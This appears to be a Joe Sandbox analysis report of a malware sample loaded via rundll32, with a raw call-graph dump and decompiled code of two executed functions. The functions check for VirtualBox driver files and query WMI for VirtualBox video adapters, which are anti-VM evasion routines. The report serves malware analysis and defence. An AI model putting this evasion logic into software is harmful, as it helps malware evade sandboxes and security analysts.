API calls 2 library calls 58609->58759 58760 1c338811c60 16 API calls _Toupper 58609->58760 58762 1c3386e7560 24 API calls 2 library calls 58609->58762 58764 1c338811c60 16 API calls _Toupper 58609->58764 58765 1c3386e76a0 33 API calls 3 library calls 58609->58765 58610 1c3386ea2f9 SHGetSpecialFolderPathA lstrcatA 58758 1c338717f50 39 API calls 58610->58758 58763 1c33871b91c CreateFileA WriteFile CloseHandle 58613->58763 58615 1c3386ea3e9 SHGetSpecialFolderPathA lstrcatA 58761 1c338717f50 39 API calls 58615->58761 58617 1c3386ea909 58770 1c338714e20 6 API calls new 58617->58770 58620->58600 58622 1c3386ea936 58771 1c3386f5cd0 94 API calls _CxxThrowException 58622->58771 58625 1c3386ea966 58630 1c3386e6530 6 API calls 58625->58630 58766 1c338811c60 16 API calls _Toupper 58626->58766 58627 1c3386eaac0 58779 1c3386e76a0 33 API calls 3 library calls 58627->58779 58628 1c3386eaae8 58633 1c3386eab02 58628->58633 58634 1c3386e6530 6 API calls 58628->58634 58635 1c3386ea99e 58630->58635 58632 1c3386ea693 Sleep 58632->58604 58637 1c3386e6400 6 API calls 58633->58637 58634->58633 58640 1c3386e6400 6 API calls 58635->58640 58636 1c3386eaae6 58636->58633 58641 1c3386eab30 __security_init_cookie 58637->58641 58638->58600 58639->58627 58639->58628 58643 1c3386ea9d3 __security_init_cookie 58640->58643 58780 1c3386e9020 6 API calls 58641->58780 58642->58600 58772 1c3386e9020 6 API calls 58643->58772 58646 1c3386eab43 58781 1c3386eb660 6 API calls 58646->58781 58649 1c3386ea9e8 58773 1c3386eb660 6 API calls 58649->58773 58651 1c3386ea5b2 Sleep 58651->58609 58653 1c3386eab50 58782 1c3386e82c0 6 API calls ctype 58653->58782 58654 1c3386ea9f5 58774 1c3386e82c0 6 API calls ctype 58654->58774 58658 1c3386eac4b 58784 1c3386e82c0 6 API calls ctype 58658->58784 58659 1c3386eaa0a 58775 1c3386e8170 6 API calls ctype 58659->58775 58661 1c3386eab64 58783 1c3386e8170 6 API calls ctype 58661->58783 58662 1c3386eac62 58785 1c3386e8170 6 API calls ctype 58662->58785 58665 1c3386eaa38 58776 1c3386e82c0 6 API calls ctype 58665->58776 58666 1c3386eac78 58786 1c3386e8170 6 API calls ctype 58666->58786 58668 1c3386eaa4d 58777 1c3386e8170 6 API calls ctype 58668->58777 58671 1c3386eaa64 58778 1c3386e8170 6 API calls ctype 58671->58778 58672 1c3386eac9e 58787 1c3386eaf10 6 API calls 58672->58787 58675 1c3386eaa78 58678 1c3386eaa8e CoUninitialize ExitProcess 58675->58678 58676 1c3386eacc3 58788 1c338714e20 6 API calls new 58676->58788 58678->58639 58679 1c3386eacf0 58789 1c3386f5cd0 94 API calls _CxxThrowException 58679->58789 58681 1c3386ead86 CoUninitialize ExitProcess 58681->58607 58682 1c3386ead20 58683 1c3386ead5e 58682->58683 58683->58681 58683->58682 58790 1c338811ed8 58684->58790 58687 1c338811c8c 58801 1c338826870 58687->58801 58689 1c3386e9172 58689->58543 58691 1c3386e6477 58690->58691 58697 1c3386e641d 58690->58697 58692 1c3386e6481 58691->58692 58693 1c3386e6523 58691->58693 58698 1c3386e6496 ctype 58692->58698 58825 1c3386e68c0 RaiseException Concurrency::cancel_current_task ctype new 58692->58825 58826 1c33880a1b0 6 API calls _CxxThrowException 58693->58826 58697->58691 58699 1c3386e6446 58697->58699 58698->58546 58700 1c3386e655e 58699->58700 58701 1c3386e6637 58699->58701 58702 1c3386e656d 58700->58702 58703 1c3386e659c 58700->58703 58829 1c33880a1d4 6 API calls _CxxThrowException 58701->58829 58705 1c3386e657b 58702->58705 58706 1c3386e6643 58702->58706 58707 1c3386e6650 58703->58707 58708 1c3386e65a6 58703->58708 58827 1c3386e67f0 6 API calls ctype 58705->58827 58830 1c33880a1d4 6 API calls _CxxThrowException 58706->58830 58831 1c33880a1b0 6 API calls _CxxThrowException 58707->58831 58714 1c3386e6597 ctype 58708->58714 58828 1c3386e68c0 RaiseException Concurrency::cancel_current_task ctype new 58708->58828 58714->58546 58716 1c33871b415 __crtLCMapStringW 58715->58716 58716->58550 58717->58553 58718->58556 58719->58557 58720->58559 58721->58561 58722->58563 58723->58565 58724->58567 58725->58571 58726->58575 58727->58568 58728->58572 58729->58579 58730->58581 58731->58574 58733 1c3386e655e 58732->58733 58734 1c3386e6637 58732->58734 58735 1c3386e656d 58733->58735 58736 1c3386e659c 58733->58736 58834 1c33880a1d4 6 API calls _CxxThrowException 58734->58834 58738 1c3386e657b 58735->58738 58739 1c3386e6643 58735->58739 58740 1c3386e6650 58736->58740 58741 1c3386e65a6 58736->58741 58832 1c3386e67f0 6 API calls ctype 58738->58832 58835 1c33880a1d4 6 API calls _CxxThrowException 58739->58835 58836 1c33880a1b0 6 API calls _CxxThrowException 58740->58836 58747 1c3386e6597 ctype 58741->58747 58833 1c3386e68c0 RaiseException Concurrency::cancel_current_task ctype new 58741->58833 58747->58583 58748->58600 58749->58600 58750->58600 58751->58600 58752->58600 58753->58600 58754->58597 58755->58603 58756->58606 58757->58610 58758->58609 58759->58609 58760->58615 58761->58609 58762->58609 58763->58609 58764->58651 58765->58609 58766->58632 58767->58599 58768->58590 58769->58617 58770->58622 58771->58625 58772->58649 58773->58654 58774->58659 58775->58665 58776->58668 58777->58671 58778->58675 58779->58636 58780->58646 58781->58653 58782->58661 58783->58658 58784->58662 58785->58666 58786->58672 58787->58676 58788->58679 58789->58682 58791 1c338811ee6 58790->58791 58792 1c338811efa 58790->58792 58798 1c338818984 5 API calls _invalid_parameter_noinfo 58791->58798 58794 1c3386e916a 58792->58794 58800 1c338827160 FreeLibrary __crtLCMapStringW __security_init_cookie 58792->58800 58794->58687 58795 1c338811eeb 58799 1c338811bc8 5 API calls _invalid_parameter_noinfo 58795->58799 58798->58795 58799->58794 58800->58794 58802 1c338826880 _com_util::ConvertStringToBSTR 58801->58802 58803 1c338826892 58802->58803 58821 1c338826f7c FreeLibrary TlsGetValue __crtLCMapStringW 58802->58821 58805 1c338822114 _Getctype 5 API calls 58803->58805 58807 1c3388268db 58803->58807 58806 1c3388268a9 58805->58806 58808 1c3388268b1 58806->58808 58822 1c338826fd4 FreeLibrary TlsSetValue __crtLCMapStringW 58806->58822 58809 1c3388268f6 SetLastError 58807->58809 58810 1c3388268e0 SetLastError 58807->58810 58814 1c338824ee0 __free_lconv_num 5 API calls 58808->58814 58824 1c33881f8c8 16 API calls abort 58809->58824 58810->58689 58812 1c3388268c8 58812->58808 58815 1c3388268cf 58812->58815 58817 1c3388268b8 58814->58817 58823 1c3388265dc 5 API calls _invalid_parameter_noinfo 58815->58823 58817->58809 58819 1c3388268d4 58820 1c338824ee0 __free_lconv_num 5 API calls 58819->58820 58820->58807 58821->58803 58822->58812 58823->58819 58825->58698 58827->58714 58828->58714 58829->58706 58830->58707 58832->58747 58833->58747 58834->58739 58835->58740 58837 1c33871fc50 58839 1c33871fcc0 fread_s 58837->58839 58838 1c338720ee0 9 API calls 58838->58839 58839->58838 58840 1c33871fd0c 58839->58840 58841 1c33880c290 _handle_error 4 API calls 58840->58841 58842 1c33871fd23 58841->58842 58843 1c338720950 GlobalMemoryStatusEx 58844 1c33880c290 _handle_error 4 API calls 58843->58844 58845 1c3387209bb 58844->58845 58846 1c338720590 58847 1c3387205be fread_s 58846->58847 58848 1c338720e50 GetCurrentProcess 58847->58848 58849 1c3387205ef 58848->58849 58850 1c3387205fb ExpandEnvironmentStringsW 58849->58850 58851 1c338720610 SHGetSpecialFolderPathW 58849->58851 58852 1c33872061f PathCombineW GetFileAttributesW 58850->58852 58851->58852 58853 1c33872064d 58852->58853 58854 1c33872066e 58852->58854 58853->58854 58855 1c338720651 58853->58855 58856 1c33880c290 _handle_error 4 API calls 58854->58856 58857 1c33880c290 _handle_error 4 API calls 58855->58857 58858 1c338720680 58856->58858 58859 1c338720666 58857->58859 58860 1c338826904 58861 1c338826919 _com_util::ConvertStringToBSTR 58860->58861 58862 1c33882692d 58861->58862 58879 1c338826f7c FreeLibrary TlsGetValue __crtLCMapStringW 58861->58879 58864 1c338822114 _Getctype 3 API calls 58862->58864 58866 1c338826976 58862->58866 58865 1c338826944 58864->58865 58867 1c33882694c 58865->58867 58880 1c338826fd4 FreeLibrary TlsSetValue __crtLCMapStringW 58865->58880 58868 1c338826985 SetLastError 58866->58868 58869 1c33882697b SetLastError 58866->58869 58872 1c338824ee0 __free_lconv_num 3 API calls 58867->58872 58871 1c338826990 58868->58871 58869->58871 58874 1c338826953 58872->58874 58873 1c338826963 58873->58867 58875 1c33882696a 58873->58875 58874->58869 58881 1c3388265dc 5 API calls _invalid_parameter_noinfo 58875->58881 58877 1c33882696f 58878 1c338824ee0 __free_lconv_num 3 API calls 58877->58878 58878->58866 58879->58862 58880->58873 58881->58877 58882 1c3386e9070 58887 1c338811c60 16 API calls _Toupper 58882->58887 58884 1c3386e9075 Sleep SleepEx 58884->58882 58885 1c3386e90ac ExitProcess 58884->58885 58886 1c3386e912d 58885->58886 58887->58884 58888 1c33871f9c0 58889 1c3387211c0 8 API calls 58888->58889 58896 1c33871f9eb _com_util::ConvertStringToBSTR 58889->58896 58890 1c33871fc43 58891 1c33871fa8a 58892 1c33871fa94 SysFreeString 58891->58892 58902 1c33871fa9d wcsstr 58891->58902 58892->58902 58893 1c33871fa81 SysFreeString 58893->58891 58894 1c33871fc33 58895 1c33871fc0d CoUninitialize 58895->58894 58896->58890 58896->58891 58896->58893 58897 1c33871fa7b CoUninitialize 58896->58897 58897->58893 58899 1c33871fb3e VariantClear 58899->58902 58900 1c33871fb93 VariantClear 58900->58902 58901 1c33871fbe8 VariantClear 58901->58902 58902->58894 58902->58895 58902->58899 58902->58900 58902->58901 58903 1c33871fd40 58904 1c33871fd90 fread_s 58903->58904 58905 1c3387210e0 12 API calls 58904->58905 58906 1c33871fdd5 58904->58906 58905->58904 58907 1c33880c290 _handle_error 4 API calls 58906->58907 58908 1c33871fdec 58907->58908 58915 1c3387209c0 58916 1c3387211c0 8 API calls 58915->58916 58922 1c3387209e5 _com_util::ConvertStringToBSTR 58916->58922 58917 1c338720bb4 58918 1c338720a7a 58919 1c338720a84 SysFreeString 58918->58919 58924 1c338720a8d 58918->58924 58919->58924 58920 1c338720a71 SysFreeString 58920->58918 58921 1c338720b75 CoUninitialize 58921->58917 58922->58917 58922->58918 58922->58920 58923 1c338720a6b CoUninitialize 58922->58923 58923->58920 58924->58917 58924->58921 58926 1c338720b54 VariantClear 58924->58926 58927 1c338720b12 StrStrIW 58924->58927 58926->58924 58928 1c338720b77 VariantClear 58927->58928 58929 1c338720b28 StrStrIW 58927->58929 58928->58921 58929->58928 58930 1c338720b3e StrStrIW 58929->58930 58930->58926 58930->58928 58944 1c33871fe00 58945 1c33871fe36 fread_s 58944->58945 58946 1c33871fea8 SHGetSpecialFolderPathW 58945->58946 58948 1c33871fef5 GetFileAttributesW 58945->58948 58949 1c33871ff79 GetCurrentProcess 58945->58949 58950 1c33871ff1a 58945->58950 58951 1c33871ff93 ExpandEnvironmentStringsW 58945->58951 58947 1c33871febf PathCombineW 58946->58947 58947->58945 58948->58945 58949->58945 58952 1c33880c290 _handle_error 4 API calls 58950->58952 58951->58947 58953 1c33871ff34 58952->58953 58954 1c33871f730 58955 1c3387211c0 8 API calls 58954->58955 58956 1c33871f760 _com_util::ConvertStringToBSTR 58955->58956 58957 1c33871f9a7 58956->58957 58958 1c33871f805 58956->58958 58960 1c33871f7fc SysFreeString 58956->58960 58963 1c33871f7f6 CoUninitialize 58956->58963 58959 1c33871f812 SysFreeString 58958->58959 58966 1c33871f81b wcsstr 58958->58966 58959->58966 58960->58958 58961 1c33871f994 58962 1c33871f96e CoUninitialize 58962->58961 58963->58960 58965 1c33871f8cd VariantClear 58965->58966 58966->58961 58966->58962 58966->58965 58967 1c33871f949 VariantClear 58966->58967 58967->58966 58974 1c338720370 58975 1c33872042c fread_s 58974->58975 58976 1c33872043d GetWindowsDirectoryW 58975->58976 58977 1c338720e50 GetCurrentProcess 58976->58977 58978 1c33872045b 58977->58978 58979 1c33872045f Wow64DisableWow64FsRedirection 58978->58979 58981 1c33872046a fread_s 58978->58981 58979->58981 58980 1c338720470 PathCombineW 58980->58981 58981->58980 58982 1c3387204b6 GetFileAttributesW 58981->58982 58986 1c3387204d2 58981->58986 58982->58981 58983 1c338720500 58984 1c33880c290 _handle_error 4 API calls 58983->58984 58985 1c338720572 58984->58985 58986->58983 58987 1c33872053f GetCurrentProcess 58986->58987 58988 1c33872054f 58987->58988 58988->58983 58989 1c338720556 Wow64RevertWow64FsRedirection 58988->58989 58989->58983 58990 1c338720770 58991 1c338720879 58990->58991 58992 1c338720881 GetUserNameW 58991->58992 58997 1c338720893 58991->58997 58995 1c3387208b9 58992->58995 58992->58997 58993 1c33880c290 _handle_error 4 API calls 58994 1c3387208b0 58993->58994 58995->58997 58998 1c338820790 18 API calls 3 library calls 58995->58998 58997->58993 58998->58995

                                        Executed Functions

                                        Function 000001C33871E430 Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 139COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 48%
                                        			E000001C31C33871E430(long long __rbx, signed long long __rdi, long long __rsi) {
				signed char _t66;
				void* _t73;
				void* _t81;
				void* _t85;
				signed long long _t98;
				signed long long _t119;
				void* _t140;
				signed long long _t145;
				WCHAR* _t150;
				void* _t151;
				void* _t153;
				signed long long _t154;
				void* _t156;

				_t145 = __rdi;
				 *((long long*)(_t153 + 8)) = __rbx;
				 *((long long*)(_t153 + 0x10)) = __rsi;
				 *((long long*)(_t153 + 0x18)) = __rdi;
				_t151 = _t153 - 0x5f0;
				_t154 = _t153 - 0x6f0;
				_t98 =  *0x38903000; // 0x9bfaf736ae76
				 *(_t151 + 0x5e0) = _t98 ^ _t154;
				 *((long long*)(_t154 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
				r8d = 0x208;
				 *((long long*)(_t154 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
				 *((long long*)(_t154 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
				 *((long long*)(_t154 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
				 *((long long*)(_t154 + 0x50)) = L"System32\\vboxdisp.dll";
				 *((long long*)(_t154 + 0x58)) = L"System32\\vboxhook.dll";
				 *((long long*)(_t154 + 0x60)) = L"System32\\vboxmrxnp.dll";
				 *((long long*)(_t154 + 0x68)) = L"System32\\vboxogl.dll";
				 *((long long*)(_t154 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
				 *((long long*)(_t154 + 0x78)) = L"System32\\vboxoglcrutil.dll";
				 *((long long*)(_t151 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
				 *((long long*)(_t151 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
				 *((long long*)(_t151 - 0x70)) = L"System32\\vboxoglpackspu.dll";
				 *((long long*)(_t151 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
				 *((long long*)(_t151 - 0x60)) = L"System32\\vboxservice.exe";
				 *((long long*)(_t151 - 0x58)) = L"System32\\vboxtray.exe";
				 *((long long*)(_t151 - 0x50)) = L"System32\\VBoxControl.exe";
				E000001C31C33880E410(_t73, 0, _t81, _t85, _t151 + 0x1d0, _t140, __rdi, _t156);
				r8d = 0x208;
				E000001C31C33880E410(_t73, 0, _t81, _t85, _t151 - 0x40, _t140, _t145, _t156);
				 *(_t154 + 0x28) = _t145;
				GetWindowsDirectoryW(_t150);
				if (E000001C31C338720E50() == 0) goto 0x3871e577;
				__imp__Wow64DisableWow64FsRedirection();
				_t119 = _t145;
				__imp__PathCombineW();
				r8d = 0x200;
				E000001C31C33880E410(_t73, 0, 0, _t85, _t151 + 0x3e0, _t151 + 0x1d0, _t145,  *((intOrPtr*)(_t154 + 0x30 + _t119 * 8)));
				0x3871e130();
				_t66 = GetFileAttributesW(??); // executed
				if (_t66 == 0xffffffff) goto 0x3871e5d9;
				if ((_t66 & 0x00000010) == 0) goto 0x3871e5e4;
				if (_t119 + 1 - 0x11 < 0) goto 0x3871e580;
				goto 0x3871e5e9;
				 *((intOrPtr*)(_t154 + 0x20)) = 0;
				if ( *0x38904490 == 8) goto 0x3871e612;
				if (1 - 0x1e < 0) goto 0x3871e600;
				goto 0x3871e671;
				if ( *0x1C3389044E4 == dil) goto 0x3871e671;
				if ( *0x38904490 == 8) goto 0x3871e63a;
				if (1 - 0x1e < 0) goto 0x3871e628;
				goto 0x3871e64f;
				if ( *((intOrPtr*)(0x1c3389044e4)) == dil) goto 0x3871e64f;
				GetCurrentProcess();
				 *((long long*)( *0x1C3389044E8))();
				if ( *((intOrPtr*)(_t154 + 0x20)) == 0) goto 0x3871e671;
				__imp__Wow64RevertWow64FsRedirection();
				E000001C31C33880C290();
				return 1;
			}
















                                        0x1c33871e430
                                        0x1c33871e430
                                        0x1c33871e435
                                        0x1c33871e43a
                                        0x1c33871e440
                                        0x1c33871e448
                                        0x1c33871e44f
                                        0x1c33871e459
                                        0x1c33871e469
                                        0x1c33871e47c
                                        0x1c33871e482
                                        0x1c33871e48e
                                        0x1c33871e49a
                                        0x1c33871e4a6
                                        0x1c33871e4b2
                                        0x1c33871e4be
                                        0x1c33871e4ca
                                        0x1c33871e4d6
                                        0x1c33871e4e2
                                        0x1c33871e4ee
                                        0x1c33871e4f9
                                        0x1c33871e504
                                        0x1c33871e50f
                                        0x1c33871e51a
                                        0x1c33871e525
                                        0x1c33871e530
                                        0x1c33871e534
                                        0x1c33871e53f
                                        0x1c33871e545
                                        0x1c33871e558
                                        0x1c33871e55d
                                        0x1c33871e56a
                                        0x1c33871e571
                                        0x1c33871e579
                                        0x1c33871e590
                                        0x1c33871e59f
                                        0x1c33871e5a5
                                        0x1c33871e5c1
                                        0x1c33871e5ca
                                        0x1c33871e5d3
                                        0x1c33871e5d7
                                        0x1c33871e5e0
                                        0x1c33871e5e2
                                        0x1c33871e5f0
                                        0x1c33871e603
                                        0x1c33871e60e
                                        0x1c33871e610
                                        0x1c33871e621
                                        0x1c33871e62b
                                        0x1c33871e636
                                        0x1c33871e638
                                        0x1c33871e648
                                        0x1c33871e64f
                                        0x1c33871e65d
                                        0x1c33871e664
                                        0x1c33871e66b
                                        0x1c33871e67d
                                        0x1c33871e69a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                                        • API String ID: 2137468328-1036852472
                                        • Opcode ID: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction ID: f9138dda25ae0f135dffb05e7e0eba160cfad2e1234d6796825a0edb0ed7da49
                                        • Opcode Fuzzy Hash: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction Fuzzy Hash: 99618B32250F8096FB11DB14E8446DA73A6FB84784F94A127DDAD07B64EF38C784C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871EC20 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 191memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 35 1c33871ec20-1c33871ec82 call 1c3387211c0 38 1c33871ec88-1c33871ecc8 call 1c3388445f8 * 2 35->38 39 1c33871ef2b-1c33871ef2e 35->39 47 1c33871ecca-1c33871eccd 38->47 48 1c33871ed20-1c33871ed23 38->48 40 1c33871ef12-1c33871ef2a call 1c33880c290 39->40 51 1c33871ed17-1c33871ed1a SysFreeString 47->51 52 1c33871eccf-1c33871ecec 47->52 49 1c33871ed25-1c33871ed28 SysFreeString 48->49 50 1c33871ed2e-1c33871ed30 48->50 49->50 53 1c33871ed36-1c33871ed45 50->53 54 1c33871eef7-1c33871ef0a 50->54 51->48 55 1c33871ecf6-1c33871ecf8 52->55 56 1c33871eed7-1c33871eef1 CoUninitialize 53->56 57 1c33871ed4b 53->57 54->40 55->51 58 1c33871ecfa-1c33871ed11 CoUninitialize 55->58 56->54 59 1c33871ed53-1c33871ed56 57->59 58->51 61 1c33871ed5c-1c33871ed7a 59->61 62 1c33871eecf 59->62 66 1c33871eecb 61->66 67 1c33871ed80-1c33871eda4 61->67 62->56 66->62 71 1c33871edaa-1c33871edb2 67->71 72 1c33871eeb2-1c33871eec3 67->72 71->72 73 1c33871edb8-1c33871edba 71->73 72->59 78 1c33871eec9 72->78 74 1c33871eea8-1c33871eeac VariantClear 73->74 75 1c33871edc0-1c33871edd3 StrCmpIW 73->75 74->72 75->74 77 1c33871edd9-1c33871ee18 VariantClear SafeArrayAccessData 75->77 77->74 80 1c33871ee1e-1c33871ee4e SafeArrayGetLBound SafeArrayGetUBound 77->80 78->62 81 1c33871ee9f-1c33871eea2 SafeArrayUnaccessData 80->81 82 1c33871ee50-1c33871ee68 SafeArrayGetElement 80->82 81->74 83 1c33871ee70-1c33871ee7e call 1c338820790 82->83 86 1c33871ee99 83->86 87 1c33871ee80-1c33871ee89 83->87 86->81 87->83 88 1c33871ee8b-1c33871ee95 87->88 88->82 89 1c33871ee97 88->89 89->81
                                        C-Code - Quality: 21%
                                        			E000001C31C33871EC20(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
				void* _t80;
				void* _t81;
				signed char _t87;
				void* _t88;
				intOrPtr _t91;
				void* _t107;
				signed long long _t128;
				long long _t132;
				intOrPtr* _t151;
				long long _t187;
				void* _t189;
				void* _t190;
				signed long long _t191;
				long long _t201;
				void* _t205;

				_t187 = __rsi;
				_t189 = _t190 - 0x47;
				_t191 = _t190 - 0xb0;
				_t128 =  *0x38903000; // 0x9bfaf736ae76
				 *(_t189 + 0x37) = _t128 ^ _t191;
				r12d = 0;
				 *((long long*)(_t189 + 0x1f)) = L"vboxvideo";
				 *((long long*)(_t189 - 0x21)) = _t201;
				 *((long long*)(_t189 + 0x27)) = L"VBoxVideoW8";
				_t132 = L"VBoxWddm";
				 *((long long*)(_t189 - 0x11)) = _t201;
				 *((long long*)(_t189 + 0x2f)) = _t132;
				r15d = r12d;
				 *((long long*)(_t189 - 0x29)) = _t201;
				_t81 = E000001C31C3387211C0(_t80, _t189 - 0x21, _t189 - 0x11, __rsi); // executed
				if (_t81 == 0) goto 0x3871ef2b;
				 *((long long*)(_t191 + 0xd0)) = __rbx;
				 *((long long*)(_t191 + 0xd8)) = _t187;
				 *((long long*)(_t191 + 0xe0)) = __rdi;
				__imp__#2();
				__imp__#2();
				if (_t132 == 0) goto 0x3871ed20;
				if (_t132 == 0) goto 0x3871ed17;
				 *((long long*)(_t191 + 0x28)) = _t189 - 0x29;
				_t18 = _t201 + 0x30; // 0x30
				r9d = _t18;
				 *((long long*)(_t191 + 0x20)) = _t201;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0xa0))() >= 0) goto 0x3871ed17;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (_t132 == 0) goto 0x3871ed2e;
				__imp__#6();
				if (r12d == 0) goto 0x3871eef7;
				_t151 =  *((intOrPtr*)(_t189 - 0x29));
				 *((long long*)(_t189 - 0x31)) = _t201;
				 *((intOrPtr*)(_t189 - 0x35)) = r12d;
				if (_t151 == 0) goto 0x3871eed7;
				 *((long long*)(_t191 + 0xe8)) = __r14;
				if (r15d != 0) goto 0x3871eecf;
				 *((long long*)(_t191 + 0x20)) = _t189 - 0x35;
				_t32 = _t205 + 1; // 0x1, executed
				r8d = _t32;
				 *((intOrPtr*)( *_t151 + 0x20))();
				if ( *((intOrPtr*)(_t189 - 0x35)) == r12d) goto 0x3871eecb;
				 *((long long*)(_t191 + 0x28)) = _t201;
				r8d = 0;
				 *((long long*)(_t191 + 0x20)) = _t201;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))() < 0) goto 0x3871eeb2;
				_t87 =  *(_t189 - 9) & 0x0000ffff;
				if (_t87 == 1) goto 0x3871eeb2;
				if ((_t87 & 0x00000008) == 0) goto 0x3871eea8;
				__imp__StrCmpIW();
				if (_t87 != 0) goto 0x3871eea8;
				__imp__#9();
				 *((long long*)(_t191 + 0x28)) = _t201;
				r8d = 0;
				 *((long long*)(_t191 + 0x20)) = _t201;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))();
				__imp__#23();
				if (_t88 < 0) goto 0x3871eea8;
				__imp__#20();
				_t55 = _t205 + 1; // 0x1
				__imp__#19();
				_t107 =  *((intOrPtr*)(_t189 - 0x19)) -  *((intOrPtr*)(_t189 - 0x15)) + 1;
				 *((intOrPtr*)(_t189 - 0x39)) = r12d;
				if (_t107 <= 0) goto 0x3871ee9f;
				__imp__#25(); // executed
				if (E000001C31C338820790(_t55,  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))),  *((intOrPtr*)(_t189 + 0xf)),  *((intOrPtr*)(_t189 + 0x1f))) == 0) goto 0x3871ee99;
				if (r12d + 1 - 3 < 0) goto 0x3871ee70;
				_t91 =  *((intOrPtr*)(_t189 - 0x39)) + 1;
				 *((intOrPtr*)(_t189 - 0x39)) = _t91;
				if (_t91 - _t107 < 0) goto 0x3871ee50;
				goto 0x3871ee9f;
				r15d = 1;
				__imp__#24();
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x10))();
				if ( *((intOrPtr*)(_t189 - 0x29)) != 0) goto 0x3871ed53;
				goto 0x3871eecf;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x29)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				E000001C31C33880C290();
				return r15d;
			}


















                                        0x1c33871ec20
                                        0x1c33871ec26
                                        0x1c33871ec2b
                                        0x1c33871ec32
                                        0x1c33871ec3c
                                        0x1c33871ec40
                                        0x1c33871ec4a
                                        0x1c33871ec59
                                        0x1c33871ec5d
                                        0x1c33871ec65
                                        0x1c33871ec6c
                                        0x1c33871ec70
                                        0x1c33871ec74
                                        0x1c33871ec77
                                        0x1c33871ec7b
                                        0x1c33871ec82
                                        0x1c33871ec88
                                        0x1c33871ec97
                                        0x1c33871ec9f
                                        0x1c33871eca7
                                        0x1c33871ecb7
                                        0x1c33871ecc8
                                        0x1c33871eccd
                                        0x1c33871ecd7
                                        0x1c33871ecdc
                                        0x1c33871ecdc
                                        0x1c33871ece4
                                        0x1c33871ecf8
                                        0x1c33871ed04
                                        0x1c33871ed0e
                                        0x1c33871ed11
                                        0x1c33871ed1a
                                        0x1c33871ed23
                                        0x1c33871ed28
                                        0x1c33871ed30
                                        0x1c33871ed36
                                        0x1c33871ed3a
                                        0x1c33871ed3e
                                        0x1c33871ed45
                                        0x1c33871ed4b
                                        0x1c33871ed56
                                        0x1c33871ed63
                                        0x1c33871ed6f
                                        0x1c33871ed6f
                                        0x1c33871ed73
                                        0x1c33871ed7a
                                        0x1c33871ed88
                                        0x1c33871ed94
                                        0x1c33871ed97
                                        0x1c33871eda4
                                        0x1c33871edaa
                                        0x1c33871edb2
                                        0x1c33871edba
                                        0x1c33871edcb
                                        0x1c33871edd3
                                        0x1c33871eddd
                                        0x1c33871edeb
                                        0x1c33871edf7
                                        0x1c33871edfa
                                        0x1c33871ee02
                                        0x1c33871ee10
                                        0x1c33871ee18
                                        0x1c33871ee29
                                        0x1c33871ee36
                                        0x1c33871ee3a
                                        0x1c33871ee46
                                        0x1c33871ee48
                                        0x1c33871ee4e
                                        0x1c33871ee5b
                                        0x1c33871ee7e
                                        0x1c33871ee89
                                        0x1c33871ee8e
                                        0x1c33871ee90
                                        0x1c33871ee95
                                        0x1c33871ee97
                                        0x1c33871ee99
                                        0x1c33871eea2
                                        0x1c33871eeac
                                        0x1c33871eeb9
                                        0x1c33871eec3
                                        0x1c33871eec9
                                        0x1c33871eeda
                                        0x1c33871eee4
                                        0x1c33871eeee
                                        0x1c33871eef1
                                        0x1c33871ef19
                                        0x1c33871ef2a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
